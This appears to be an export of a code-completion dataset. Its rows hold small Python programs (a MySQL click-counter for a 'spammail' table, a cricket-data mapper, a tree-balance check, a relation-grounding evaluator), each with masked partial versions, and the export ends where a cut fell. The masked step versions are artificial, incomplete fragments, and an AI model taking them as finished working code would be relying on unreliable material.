code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
---|---|---|---|
import MySQLdb
from MySQLdb import escape_string as thwart
"""
"""
class DatabaseConnection:
    """Small helper wrapping MySQLdb access to the User/spammail tables.

    Every public operation opens a fresh connection (port fixed at 3306),
    runs its statement(s), commits, and closes the connection again.
    Operations report success with a boolean / list instead of raising.
    """

    def __init__(self, address, user, password, database):
        # Credentials only; the actual connection is created in connect().
        self.address = address
        self.user = user
        self.password = password
        self.database = database

    def connect(self):
        """Open a new connection and return a (cursor, connection) pair."""
        self.conn = MySQLdb.connect(host=self.address,
                                    port=3306,
                                    user=self.user,
                                    passwd=self.password,
                                    db=self.database)
        c = self.conn.cursor()
        return c, self.conn

    def disconnect(self):
        """Close the most recently opened connection."""
        self.conn.close()

    def addEmail(self, email, number):
        """Insert a (email, maxEmailsPerMonth) row; True on success.

        NOTE(review): values go through escape_string *and* %s parameter
        binding, so they are stored double-escaped; kept for backward
        compatibility with existing rows — confirm before removing thwart().
        """
        try:
            c, conn = self.connect()
            try:
                c.execute("INSERT INTO User (email, maxEmailsPerMonth) VALUES (%s, %s)",
                          (thwart(email), thwart(number),))
                conn.commit()
            finally:
                # Close the connection even when execute/commit raises
                # (previously it was leaked on error).
                self.disconnect()
            return True
        except Exception:
            return False

    def removeEmail(self, email):
        """Delete the User row matching email; True on success."""
        try:
            c, conn = self.connect()
            try:
                c.execute("DELETE from User WHERE email = (%s)", (thwart(email),))
                conn.commit()
            finally:
                self.disconnect()
            return True
        except Exception:
            return False

    def updateSpamTable(self, mailID, repo):
        """Create or increment the click counter for mailID in spammail.

        Returns True on success, False on any error.
        """
        try:
            c, conn = self.connect()
            try:
                # execute() returns the number of matched rows, which tells
                # us whether the row already exists.
                no = c.execute("SELECT * FROM spammail WHERE idEmail = %s", (thwart(mailID),))
                if no == 0:
                    c.execute("INSERT INTO spammail (numClicked, repo, idEmail) VALUES (%s, %s, %s)",
                              (1, thwart(repo), thwart(mailID),))
                else:
                    c.execute("SELECT numClicked FROM spammail WHERE idEmail = %s", (thwart(mailID),))
                    no = c.fetchone()[0]
                    c.execute("UPDATE spammail SET numClicked = %s WHERE idEmail = %s",
                              (no + 1, thwart(mailID),))
                conn.commit()
            finally:
                self.disconnect()
            return True
        except Exception:
            # Was a bare except; narrowed so KeyboardInterrupt/SystemExit
            # still propagate.
            return False

    def getMostClicked(self):
        """Return [idEmail, repo, numClicked] of the most-clicked mail, or []."""
        try:
            c, conn = self.connect()
            try:
                c.execute("SELECT idEmail, repo, numClicked FROM SpamMail ORDER BY numClicked DESC LIMIT 1")
                data = c.fetchone()
            finally:
                self.disconnect()
            if data is None:
                # Empty table: previously a TypeError swallowed by a bare
                # except; now handled explicitly.
                return []
            return [data[0], data[1], data[2]]
        except Exception:
            return []
|
normal
|
{
"blob_id": "c6502d6b589fa75dfbd5946a1097e77fc0b472c4",
"index": 1126,
"step-1": "<mask token>\n\n\nclass DatabaseConnection:\n <mask token>\n <mask token>\n\n def connect(self):\n self.conn = MySQLdb.connect(host=self.address, port=3306, user=self\n .user, passwd=self.password, db=self.database)\n c = self.conn.cursor()\n return c, self.conn\n\n def disconnect(self):\n self.conn.close()\n\n def addEmail(self, email, number):\n try:\n c, conn = self.connect()\n c.execute(\n 'INSERT INTO User (email, maxEmailsPerMonth) VALUES (%s, %s)',\n (thwart(email), thwart(number)))\n conn.commit()\n self.disconnect()\n return True\n except Exception:\n return False\n\n def removeEmail(self, email):\n try:\n c, conn = self.connect()\n c.execute('DELETE from User WHERE email = (%s)', (thwart(email),))\n conn.commit()\n self.disconnect()\n return True\n except Exception:\n return False\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass DatabaseConnection:\n <mask token>\n <mask token>\n\n def connect(self):\n self.conn = MySQLdb.connect(host=self.address, port=3306, user=self\n .user, passwd=self.password, db=self.database)\n c = self.conn.cursor()\n return c, self.conn\n\n def disconnect(self):\n self.conn.close()\n\n def addEmail(self, email, number):\n try:\n c, conn = self.connect()\n c.execute(\n 'INSERT INTO User (email, maxEmailsPerMonth) VALUES (%s, %s)',\n (thwart(email), thwart(number)))\n conn.commit()\n self.disconnect()\n return True\n except Exception:\n return False\n\n def removeEmail(self, email):\n try:\n c, conn = self.connect()\n c.execute('DELETE from User WHERE email = (%s)', (thwart(email),))\n conn.commit()\n self.disconnect()\n return True\n except Exception:\n return False\n <mask token>\n\n def getMostClicked(self):\n try:\n c, conn = self.connect()\n c.execute(\n 'SELECT idEmail, repo, numClicked FROM SpamMail ORDER BY numClicked DESC LIMIT 1'\n )\n data = c.fetchone()\n print(data)\n self.disconnect()\n return [data[0], data[1], data[2]]\n except:\n return []\n",
"step-3": "<mask token>\n\n\nclass DatabaseConnection:\n <mask token>\n <mask token>\n\n def connect(self):\n self.conn = MySQLdb.connect(host=self.address, port=3306, user=self\n .user, passwd=self.password, db=self.database)\n c = self.conn.cursor()\n return c, self.conn\n\n def disconnect(self):\n self.conn.close()\n\n def addEmail(self, email, number):\n try:\n c, conn = self.connect()\n c.execute(\n 'INSERT INTO User (email, maxEmailsPerMonth) VALUES (%s, %s)',\n (thwart(email), thwart(number)))\n conn.commit()\n self.disconnect()\n return True\n except Exception:\n return False\n\n def removeEmail(self, email):\n try:\n c, conn = self.connect()\n c.execute('DELETE from User WHERE email = (%s)', (thwart(email),))\n conn.commit()\n self.disconnect()\n return True\n except Exception:\n return False\n\n def updateSpamTable(self, mailID, repo):\n try:\n c, conn = self.connect()\n no = c.execute('SELECT * FROM spammail WHERE idEmail = %s', (\n thwart(mailID),))\n print(no)\n if no == 0:\n c.execute(\n 'INSERT INTO spammail (numClicked, repo, idEmail) VALUES (%s, %s, %s)'\n , (1, thwart(repo), thwart(mailID)))\n else:\n c.execute('SELECT numClicked FROM spammail WHERE idEmail = %s',\n (thwart(mailID),))\n no = c.fetchone()[0]\n print(no)\n c.execute(\n 'UPDATE spammail SET numClicked = %s WHERE idEmail = %s',\n (no + 1, thwart(mailID)))\n conn.commit()\n self.disconnect()\n print('here')\n return True\n except:\n return False\n\n def getMostClicked(self):\n try:\n c, conn = self.connect()\n c.execute(\n 'SELECT idEmail, repo, numClicked FROM SpamMail ORDER BY numClicked DESC LIMIT 1'\n )\n data = c.fetchone()\n print(data)\n self.disconnect()\n return [data[0], data[1], data[2]]\n except:\n return []\n",
"step-4": "<mask token>\n\n\nclass DatabaseConnection:\n\n def __init__(self, address, user, password, database):\n self.address = address\n self.user = user\n self.password = password\n self.database = database\n <mask token>\n\n def connect(self):\n self.conn = MySQLdb.connect(host=self.address, port=3306, user=self\n .user, passwd=self.password, db=self.database)\n c = self.conn.cursor()\n return c, self.conn\n\n def disconnect(self):\n self.conn.close()\n\n def addEmail(self, email, number):\n try:\n c, conn = self.connect()\n c.execute(\n 'INSERT INTO User (email, maxEmailsPerMonth) VALUES (%s, %s)',\n (thwart(email), thwart(number)))\n conn.commit()\n self.disconnect()\n return True\n except Exception:\n return False\n\n def removeEmail(self, email):\n try:\n c, conn = self.connect()\n c.execute('DELETE from User WHERE email = (%s)', (thwart(email),))\n conn.commit()\n self.disconnect()\n return True\n except Exception:\n return False\n\n def updateSpamTable(self, mailID, repo):\n try:\n c, conn = self.connect()\n no = c.execute('SELECT * FROM spammail WHERE idEmail = %s', (\n thwart(mailID),))\n print(no)\n if no == 0:\n c.execute(\n 'INSERT INTO spammail (numClicked, repo, idEmail) VALUES (%s, %s, %s)'\n , (1, thwart(repo), thwart(mailID)))\n else:\n c.execute('SELECT numClicked FROM spammail WHERE idEmail = %s',\n (thwart(mailID),))\n no = c.fetchone()[0]\n print(no)\n c.execute(\n 'UPDATE spammail SET numClicked = %s WHERE idEmail = %s',\n (no + 1, thwart(mailID)))\n conn.commit()\n self.disconnect()\n print('here')\n return True\n except:\n return False\n\n def getMostClicked(self):\n try:\n c, conn = self.connect()\n c.execute(\n 'SELECT idEmail, repo, numClicked FROM SpamMail ORDER BY numClicked DESC LIMIT 1'\n )\n data = c.fetchone()\n print(data)\n self.disconnect()\n return [data[0], data[1], data[2]]\n except:\n return []\n",
"step-5": "import MySQLdb\nfrom MySQLdb import escape_string as thwart\n\"\"\"\n\"\"\"\nclass DatabaseConnection:\n\n def __init__(self, address, user, password, database):\n self.address = address\n self.user = user\n self.password = password\n self.database = database\n\n \"\"\"\n \n \"\"\"\n def connect(self):\n self.conn = MySQLdb.connect(host=self.address,\n port=3306,\n user=self.user,\n passwd=self.password,\n db=self.database)\n\n c = self.conn.cursor()\n return c, self.conn\n\n def disconnect(self):\n self.conn.close()\n\n\n def addEmail(self, email, number):\n try:\n c, conn = self.connect()\n c.execute(\"INSERT INTO User (email, maxEmailsPerMonth) VALUES (%s, %s)\", (thwart(email), thwart(number),))\n conn.commit()\n self.disconnect()\n return True\n except Exception:\n return False\n\n def removeEmail(self, email):\n try:\n c, conn = self.connect()\n c.execute(\"DELETE from User WHERE email = (%s)\", (thwart(email),))\n conn.commit()\n self.disconnect()\n return True\n except Exception:\n return False\n\n\n def updateSpamTable(self, mailID, repo):\n try:\n c, conn = self.connect()\n no = c.execute(\"SELECT * FROM spammail WHERE idEmail = %s\", (thwart(mailID),))\n print(no)\n if no == 0:\n c.execute(\"INSERT INTO spammail (numClicked, repo, idEmail) VALUES (%s, %s, %s)\", (1, thwart(repo), thwart(mailID),))\n else:\n c.execute(\"SELECT numClicked FROM spammail WHERE idEmail = %s\", (thwart(mailID),))\n no = c.fetchone()[0]\n print(no)\n c.execute(\"UPDATE spammail SET numClicked = %s WHERE idEmail = %s\", (no+1, thwart(mailID),))\n\n conn.commit()\n self.disconnect()\n print(\"here\")\n return True\n except:\n return False\n\n def getMostClicked(self):\n try:\n c, conn = self.connect()\n c.execute(\"SELECT idEmail, repo, numClicked FROM SpamMail ORDER BY numClicked DESC LIMIT 1\")\n data = c.fetchone()\n print(data)\n self.disconnect()\n return [data[0], data[1], data[2]]\n except:\n return []\n\n",
"step-ids": [
5,
6,
7,
8,
11
]
}
|
[
5,
6,
7,
8,
11
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
# Hadoop-streaming style mapper fragment: emits "batsman,bowler<TAB>dismissed<TAB>1"
# for each delivery record.  NOTE(review): `infile` is not defined in this
# fragment — presumably sys.stdin, as in the complete variant later in the file.
for line in infile:
    line = line.strip()
    my_list = line.split(',')
    # Keep only delivery ("ball") rows; skip metadata/info rows.
    if my_list[0] != 'ball':
        continue
    batsman = my_list[4]
    bowler = my_list[6]
    # Column 9 appears to hold the dismissal kind; run out / retired hurt /
    # an empty '""' field are presumably not credited to the bowler — confirm
    # against the CSV schema.
    if my_list[9] == 'run out' or my_list[9] == '""' or my_list[9
        ] == 'retired hurt':
        dismissed = '0'
    else:
        dismissed = '1'
    print('%s,%s\t%s\t%s' % (batsman, bowler, dismissed, '1'))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
# Mapper variant reading from standard input.  NOTE(review): `sys` is not
# imported in this fragment — see the complete variant later in the file.
infile = sys.stdin
for line in infile:
    line = line.strip()
    my_list = line.split(',')
    # Keep only delivery ("ball") rows.
    if my_list[0] != 'ball':
        continue
    batsman = my_list[4]
    bowler = my_list[6]
    # Dismissal kinds presumably not credited to the bowler map to '0'.
    if my_list[9] == 'run out' or my_list[9] == '""' or my_list[9
        ] == 'retired hurt':
        dismissed = '0'
    else:
        dismissed = '1'
    print('%s,%s\t%s\t%s' % (batsman, bowler, dismissed, '1'))
<|reserved_special_token_1|>
# Hadoop-streaming mapper: reads ball-by-ball CSV rows on stdin and emits
# "batsman,bowler<TAB>dismissed<TAB>1" per delivery.
# NOTE(review): `csv` is imported but unused in this variant.
import sys
import csv
infile = sys.stdin
for line in infile:
    line = line.strip()
    my_list = line.split(',')
    # Keep only delivery ("ball") rows.
    if my_list[0] != 'ball':
        continue
    batsman = my_list[4]
    bowler = my_list[6]
    # Dismissal kinds presumably not credited to the bowler map to '0'.
    if my_list[9] == 'run out' or my_list[9] == '""' or my_list[9
        ] == 'retired hurt':
        dismissed = '0'
    else:
        dismissed = '1'
    print('%s,%s\t%s\t%s' % (batsman, bowler, dismissed, '1'))
<|reserved_special_token_1|>
#!/usr/bin/python3
"""Hadoop-streaming mapper for ball-by-ball cricket CSV data.

Reads delivery rows on stdin and writes one record per 'ball' row:
    batsman,bowler<TAB>dismissed<TAB>1
where dismissed is '0' for dismissal kinds in {run out, '""', retired hurt}
and '1' otherwise.
"""
import sys
import csv

for raw in sys.stdin:
    fields = raw.strip().split(',')
    # Skip anything that is not a delivery record.
    if fields[0] != 'ball':
        continue
    striker = fields[4]
    bowler = fields[6]
    kind = fields[9]
    dismissed = '0' if kind in ('run out', '""', 'retired hurt') else '1'
    print('%s,%s\t%s\t%s' % (striker, bowler, dismissed, '1'))
|
flexible
|
{
"blob_id": "cfa7dc295c635bbdf707f1e899c4fbf8ea91df9a",
"index": 1209,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor line in infile:\n line = line.strip()\n my_list = line.split(',')\n if my_list[0] != 'ball':\n continue\n batsman = my_list[4]\n bowler = my_list[6]\n if my_list[9] == 'run out' or my_list[9] == '\"\"' or my_list[9\n ] == 'retired hurt':\n dismissed = '0'\n else:\n dismissed = '1'\n print('%s,%s\\t%s\\t%s' % (batsman, bowler, dismissed, '1'))\n",
"step-3": "<mask token>\ninfile = sys.stdin\nfor line in infile:\n line = line.strip()\n my_list = line.split(',')\n if my_list[0] != 'ball':\n continue\n batsman = my_list[4]\n bowler = my_list[6]\n if my_list[9] == 'run out' or my_list[9] == '\"\"' or my_list[9\n ] == 'retired hurt':\n dismissed = '0'\n else:\n dismissed = '1'\n print('%s,%s\\t%s\\t%s' % (batsman, bowler, dismissed, '1'))\n",
"step-4": "import sys\nimport csv\ninfile = sys.stdin\nfor line in infile:\n line = line.strip()\n my_list = line.split(',')\n if my_list[0] != 'ball':\n continue\n batsman = my_list[4]\n bowler = my_list[6]\n if my_list[9] == 'run out' or my_list[9] == '\"\"' or my_list[9\n ] == 'retired hurt':\n dismissed = '0'\n else:\n dismissed = '1'\n print('%s,%s\\t%s\\t%s' % (batsman, bowler, dismissed, '1'))\n",
"step-5": "#!/usr/bin/python3\nimport sys\nimport csv\ninfile = sys.stdin\n\nfor line in infile:\n line = line.strip()\n my_list = line.split(',')\n if my_list[0] != \"ball\":\n continue\n batsman = my_list[4]\n bowler = my_list[6]\n if my_list[9] == 'run out' or my_list[9] == '\"\"' or my_list[9] == \"retired hurt\":\n dismissed = '0'\n else:\n dismissed = '1'\n print('%s,%s\\t%s\\t%s' % (batsman,bowler,dismissed,'1')) \n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
def is_balanced(tree_root):
    """Return True if the tree is "superbalanced".

    A tree is superbalanced when the depths of any two leaf nodes differ
    by at most one.  Nodes are expected to expose ``left`` and ``right``
    attributes (None/falsy for a missing child).

    Iterative DFS: push (node, depth) pairs on a stack, record each
    distinct leaf depth in a set, and bail out as soon as two recorded
    depths are more than 1 apart.
    """
    if tree_root is None:
        # An empty tree is trivially balanced.
        return True

    stack = [(tree_root, 0)]   # (node, depth) pairs still to visit
    depths = set()             # distinct leaf depths seen so far (O(1) lookup)

    while stack:
        node, depth = stack.pop()
        if (not node.left) and (not node.right):
            # Leaf: record its depth and re-check the balance invariant.
            depths.add(depth)
            if len(depths) > 1 and max(depths) - min(depths) > 1:
                return False
        else:
            if node.left:
                stack.append((node.left, depth + 1))
            if node.right:
                stack.append((node.right, depth + 1))
    return True
|
normal
|
{
"blob_id": "833c8234d829dfa1937392f0ad4952aeffa4e26d",
"index": 1150,
"step-1": "<mask token>\n",
"step-2": "def is_balanced(tree_root):\n if tree_root is None:\n return True\n nodeQ = [(tree_root, 0)]\n depths = []\n while len(nodeQ):\n last_node, depth = nodeQ.pop()\n if not last_node.left and not last_node.right:\n if depth not in depths:\n depths.append(depth)\n if len(depths) > 1 and max(depths) - min(depths) > 1:\n return False\n else:\n if last_node.left:\n nodeQ.append((last_node.left, depth + 1))\n if last_node.right:\n nodeQ.append((last_node.right, depth + 1))\n return True\n",
"step-3": "def is_balanced(tree_root):\n # Determine if the tree is superbalanced\n \n if tree_root is None:\n return True\n \n nodeQ = [(tree_root, 0)]\n depths = []\n \n while len(nodeQ):\n \n last_node, depth = nodeQ.pop()\n \n if( not last_node.left ) and (not last_node.right ):\n if depth not in depths:\n depths.append(depth)\n \n if ((len(depths) > 1) and (max(depths) - min(depths) > 1)):\n return False\n else:\n \n if(last_node.left):\n nodeQ.append((last_node.left, depth + 1))\n if(last_node.right):\n nodeQ.append((last_node.right, depth + 1))\n \n return True\n \n \n# store node pointer and depth as tuples\n# pop together and store in variables node, depth\n# append node.right, node.left\n# put in while loop until list is empty\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def eval_ground_scores(gt_relations, pred_relations, tiou_threshold):
    """Score one video's grounded predictions against its ground truth.

    :param gt_relations: dict mapping relation -> list of GT trajectory
        dicts, each with 'sub' and 'obj' entries.
    :param pred_relations: dict mapping relation -> predicted trajectory
        dict with 'sub' and 'obj' entries.  Every predicted relation is
        looked up in gt_relations (a missing key raises KeyError).
    :param tiou_threshold: temporal-IoU threshold counting as a hit.
    :return: (relation_acc, subject_acc, object_acc, relation_num); each
        accuracy is hits normalised by the number of GT relations.
        NOTE(review): raises ZeroDivisionError when gt_relations is empty.
    """
    relation_num = len(gt_relations)
    predict, predict_sub, predict_obj = 0, 0, 0
    for relation, pred_trajs in pred_relations.items():
        pred_sub = pred_trajs['sub']
        pred_obj = pred_trajs['obj']
        # One flag per criterion: both-match, subject-match, object-match.
        flag, flag_s, flag_o = False, False, False
        gt_trajs = gt_relations[relation]
        for gt_traj in gt_trajs:
            gt_sub = gt_traj['sub']
            gt_obj = gt_traj['obj']
            s_tiou = tiou(pred_sub, gt_sub)
            o_tiou = tiou(pred_obj, gt_obj)
            # A relation hit requires both subject and object to pass.
            r_iou = min(s_tiou, o_tiou)
            if r_iou >= tiou_threshold:
                flag = True
            if s_tiou >= tiou_threshold:
                flag_s = True
            if o_tiou >= tiou_threshold:
                flag_o = True
        if flag:
            predict += 1
        if flag_s:
            predict_sub += 1
        if flag_o:
            predict_obj += 1
    predict = predict / relation_num
    predict_sub = predict_sub / relation_num
    predict_obj = predict_obj / relation_num
    return predict, predict_sub, predict_obj, relation_num
def evaluate(groundtruth, prediction, tiou_threshold=0.5):
    """Evaluate visual-relation grounding over all videos.

    Sums per-video accuracies from eval_ground_scores and divides by the
    total number of GT videos (videos absent from the prediction contribute
    zero), then prints subject/object/relation accuracy as percentages.
    """
    video_num = len(groundtruth)
    print('Computing grounding accuracy over {} videos...'.format(video_num))
    acc, acc_sub, acc_obj = 0.0, 0.0, 0.0
    gt_rnum = 0  # total GT relations over evaluated videos (accumulated only)
    for qid, relation_gt in groundtruth.items():
        if qid not in prediction:
            continue
        relation_pred = prediction[qid]
        if len(relation_pred) == 0:
            continue
        video_acc, video_acc_sub, video_acc_obj, relation_num = (
            eval_ground_scores(relation_gt, relation_pred, tiou_threshold))
        acc += video_acc
        acc_sub += video_acc_sub
        acc_obj += video_acc_obj
        gt_rnum += relation_num
    # Averaged over ALL GT videos, not just the ones with predictions.
    acc /= video_num
    acc_sub /= video_num
    acc_obj /= video_num
    print('Acc_S\t Acc_O\t Acc_R')
    print('{:.2f}\t {:.2f}\t {:.2f}'.format(acc_sub * 100, acc_obj * 100, 
        acc * 100))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def eval_ground_scores(gt_relations, pred_relations, tiou_threshold):
"""
:param gt_relations:
:param pred_relations:
:param tiou_threshold:
:return:
"""
relation_num = len(gt_relations)
predict, predict_sub, predict_obj = 0, 0, 0
for relation, pred_trajs in pred_relations.items():
pred_sub = pred_trajs['sub']
pred_obj = pred_trajs['obj']
flag, flag_s, flag_o = False, False, False
gt_trajs = gt_relations[relation]
for gt_traj in gt_trajs:
gt_sub = gt_traj['sub']
gt_obj = gt_traj['obj']
s_tiou = tiou(pred_sub, gt_sub)
o_tiou = tiou(pred_obj, gt_obj)
r_iou = min(s_tiou, o_tiou)
if r_iou >= tiou_threshold:
flag = True
if s_tiou >= tiou_threshold:
flag_s = True
if o_tiou >= tiou_threshold:
flag_o = True
if flag:
predict += 1
if flag_s:
predict_sub += 1
if flag_o:
predict_obj += 1
predict = predict / relation_num
predict_sub = predict_sub / relation_num
predict_obj = predict_obj / relation_num
return predict, predict_sub, predict_obj, relation_num
def evaluate(groundtruth, prediction, tiou_threshold=0.5):
""" evaluate visual relation detection and visual
relation tagging.
"""
video_num = len(groundtruth)
print('Computing grounding accuracy over {} videos...'.format(video_num))
acc, acc_sub, acc_obj = 0.0, 0.0, 0.0
gt_rnum = 0
for qid, relation_gt in groundtruth.items():
if qid not in prediction:
continue
relation_pred = prediction[qid]
if len(relation_pred) == 0:
continue
video_acc, video_acc_sub, video_acc_obj, relation_num = (
eval_ground_scores(relation_gt, relation_pred, tiou_threshold))
acc += video_acc
acc_sub += video_acc_sub
acc_obj += video_acc_obj
gt_rnum += relation_num
acc /= video_num
acc_sub /= video_num
acc_obj /= video_num
print('Acc_S\t Acc_O\t Acc_R')
print('{:.2f}\t {:.2f}\t {:.2f}'.format(acc_sub * 100, acc_obj * 100,
acc * 100))
def main():
groundtruth_dir = 'dataset/vidvrd/'
gt_file = osp.join(groundtruth_dir, 'gt_relation_frame.json')
result_dir = 'results/'
res_file = osp.join(result_dir, 'test_viterbi_1gap_04_batch.json')
if not osp.exists(res_file):
print('Generating ...')
generate_track_link.main(res_file)
grountruth = load_file(gt_file)
prediction = load_file(res_file)
evaluate(grountruth, prediction)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def eval_ground_scores(gt_relations, pred_relations, tiou_threshold):
"""
:param gt_relations:
:param pred_relations:
:param tiou_threshold:
:return:
"""
relation_num = len(gt_relations)
predict, predict_sub, predict_obj = 0, 0, 0
for relation, pred_trajs in pred_relations.items():
pred_sub = pred_trajs['sub']
pred_obj = pred_trajs['obj']
flag, flag_s, flag_o = False, False, False
gt_trajs = gt_relations[relation]
for gt_traj in gt_trajs:
gt_sub = gt_traj['sub']
gt_obj = gt_traj['obj']
s_tiou = tiou(pred_sub, gt_sub)
o_tiou = tiou(pred_obj, gt_obj)
r_iou = min(s_tiou, o_tiou)
if r_iou >= tiou_threshold:
flag = True
if s_tiou >= tiou_threshold:
flag_s = True
if o_tiou >= tiou_threshold:
flag_o = True
if flag:
predict += 1
if flag_s:
predict_sub += 1
if flag_o:
predict_obj += 1
predict = predict / relation_num
predict_sub = predict_sub / relation_num
predict_obj = predict_obj / relation_num
return predict, predict_sub, predict_obj, relation_num
def evaluate(groundtruth, prediction, tiou_threshold=0.5):
""" evaluate visual relation detection and visual
relation tagging.
"""
video_num = len(groundtruth)
print('Computing grounding accuracy over {} videos...'.format(video_num))
acc, acc_sub, acc_obj = 0.0, 0.0, 0.0
gt_rnum = 0
for qid, relation_gt in groundtruth.items():
if qid not in prediction:
continue
relation_pred = prediction[qid]
if len(relation_pred) == 0:
continue
video_acc, video_acc_sub, video_acc_obj, relation_num = (
eval_ground_scores(relation_gt, relation_pred, tiou_threshold))
acc += video_acc
acc_sub += video_acc_sub
acc_obj += video_acc_obj
gt_rnum += relation_num
acc /= video_num
acc_sub /= video_num
acc_obj /= video_num
print('Acc_S\t Acc_O\t Acc_R')
print('{:.2f}\t {:.2f}\t {:.2f}'.format(acc_sub * 100, acc_obj * 100,
acc * 100))
def main():
groundtruth_dir = 'dataset/vidvrd/'
gt_file = osp.join(groundtruth_dir, 'gt_relation_frame.json')
result_dir = 'results/'
res_file = osp.join(result_dir, 'test_viterbi_1gap_04_batch.json')
if not osp.exists(res_file):
print('Generating ...')
generate_track_link.main(res_file)
grountruth = load_file(gt_file)
prediction = load_file(res_file)
evaluate(grountruth, prediction)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import os.path as osp
from evaluations.common import tiou
from evaluations.util import load_file
import generate_track_link
def eval_ground_scores(gt_relations, pred_relations, tiou_threshold):
"""
:param gt_relations:
:param pred_relations:
:param tiou_threshold:
:return:
"""
relation_num = len(gt_relations)
predict, predict_sub, predict_obj = 0, 0, 0
for relation, pred_trajs in pred_relations.items():
pred_sub = pred_trajs['sub']
pred_obj = pred_trajs['obj']
flag, flag_s, flag_o = False, False, False
gt_trajs = gt_relations[relation]
for gt_traj in gt_trajs:
gt_sub = gt_traj['sub']
gt_obj = gt_traj['obj']
s_tiou = tiou(pred_sub, gt_sub)
o_tiou = tiou(pred_obj, gt_obj)
r_iou = min(s_tiou, o_tiou)
if r_iou >= tiou_threshold:
flag = True
if s_tiou >= tiou_threshold:
flag_s = True
if o_tiou >= tiou_threshold:
flag_o = True
if flag:
predict += 1
if flag_s:
predict_sub += 1
if flag_o:
predict_obj += 1
predict = predict / relation_num
predict_sub = predict_sub / relation_num
predict_obj = predict_obj / relation_num
return predict, predict_sub, predict_obj, relation_num
def evaluate(groundtruth, prediction, tiou_threshold=0.5):
""" evaluate visual relation detection and visual
relation tagging.
"""
video_num = len(groundtruth)
print('Computing grounding accuracy over {} videos...'.format(video_num))
acc, acc_sub, acc_obj = 0.0, 0.0, 0.0
gt_rnum = 0
for qid, relation_gt in groundtruth.items():
if qid not in prediction:
continue
relation_pred = prediction[qid]
if len(relation_pred) == 0:
continue
video_acc, video_acc_sub, video_acc_obj, relation_num = (
eval_ground_scores(relation_gt, relation_pred, tiou_threshold))
acc += video_acc
acc_sub += video_acc_sub
acc_obj += video_acc_obj
gt_rnum += relation_num
acc /= video_num
acc_sub /= video_num
acc_obj /= video_num
print('Acc_S\t Acc_O\t Acc_R')
print('{:.2f}\t {:.2f}\t {:.2f}'.format(acc_sub * 100, acc_obj * 100,
acc * 100))
def main():
groundtruth_dir = 'dataset/vidvrd/'
gt_file = osp.join(groundtruth_dir, 'gt_relation_frame.json')
result_dir = 'results/'
res_file = osp.join(result_dir, 'test_viterbi_1gap_04_batch.json')
if not osp.exists(res_file):
print('Generating ...')
generate_track_link.main(res_file)
grountruth = load_file(gt_file)
prediction = load_file(res_file)
evaluate(grountruth, prediction)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import os.path as osp
from evaluations.common import tiou
from evaluations.util import load_file
import generate_track_link
def eval_ground_scores(gt_relations, pred_relations, tiou_threshold):
    """Score one video's grounded predictions against its ground truth.

    :param gt_relations: dict mapping relation -> list of GT trajectory
        dicts, each with 'sub' and 'obj' entries.
    :param pred_relations: dict mapping relation -> predicted trajectory
        dict with 'sub' and 'obj' entries.  Every predicted relation is
        looked up in gt_relations (a missing key raises KeyError).
    :param tiou_threshold: temporal-IoU threshold counting as a hit.
    :return: (relation_acc, subject_acc, object_acc, relation_num); each
        accuracy is hits normalised by the number of GT relations.
    """
    relation_num = len(gt_relations)
    if relation_num == 0:
        # No ground truth for this video: previously a ZeroDivisionError.
        return 0.0, 0.0, 0.0, 0

    predict, predict_sub, predict_obj = 0, 0, 0
    for relation, pred_trajs in pred_relations.items():
        pred_sub = pred_trajs['sub']
        pred_obj = pred_trajs['obj']
        # One flag per criterion: both-match, subject-match, object-match.
        flag, flag_s, flag_o = False, False, False
        for gt_traj in gt_relations[relation]:
            s_tiou = tiou(pred_sub, gt_traj['sub'])
            o_tiou = tiou(pred_obj, gt_traj['obj'])
            # A relation hit requires both subject and object to pass.
            if min(s_tiou, o_tiou) >= tiou_threshold:
                flag = True
            if s_tiou >= tiou_threshold:
                flag_s = True
            if o_tiou >= tiou_threshold:
                flag_o = True
        if flag:
            predict += 1
        if flag_s:
            predict_sub += 1
        if flag_o:
            predict_obj += 1

    predict = predict / relation_num
    predict_sub = predict_sub / relation_num
    predict_obj = predict_obj / relation_num
    return predict, predict_sub, predict_obj, relation_num
def evaluate(groundtruth, prediction, tiou_threshold=0.5):
    """Evaluate visual-relation grounding over all videos.

    Sums per-video accuracies from eval_ground_scores and divides by the
    total number of GT videos (videos absent from the prediction contribute
    zero), then prints subject/object/relation accuracy as percentages.
    """
    video_num = len(groundtruth)
    if video_num == 0:
        # Empty ground truth: previously a ZeroDivisionError below.
        print('No ground-truth videos to evaluate.')
        return
    print('Computing grounding accuracy over {} videos...'.format(video_num))

    acc, acc_sub, acc_obj = 0.0, 0.0, 0.0
    gt_rnum = 0  # total GT relations over evaluated videos (informational)
    for qid, relation_gt in groundtruth.items():
        if qid not in prediction:
            continue
        relation_pred = prediction[qid]
        if len(relation_pred) == 0:
            continue

        video_acc, video_acc_sub, video_acc_obj, relation_num = \
            eval_ground_scores(relation_gt, relation_pred, tiou_threshold)

        acc += video_acc
        acc_sub += video_acc_sub
        acc_obj += video_acc_obj
        gt_rnum += relation_num

    # Averaged over ALL GT videos, not just the ones with predictions.
    acc /= video_num
    acc_sub /= video_num
    acc_obj /= video_num
    print("Acc_S\t Acc_O\t Acc_R")
    print('{:.2f}\t {:.2f}\t {:.2f}'.format(acc_sub * 100, acc_obj * 100, acc * 100))
def main():
    """Load GT and predictions (generating the latter if absent), then evaluate."""
    # Paths are relative to the current working directory.
    groundtruth_dir = 'dataset/vidvrd/'
    gt_file = osp.join(groundtruth_dir, 'gt_relation_frame.json')
    result_dir = 'results/'
    res_file = osp.join(result_dir, 'test_viterbi_1gap_04_batch.json')
    if not osp.exists(res_file):
        # First run: build the tracking/linking result file.
        print('Generating ...')
        generate_track_link.main(res_file)
    grountruth = load_file(gt_file)
    prediction = load_file(res_file)
    evaluate(grountruth, prediction)
if __name__ == "__main__":
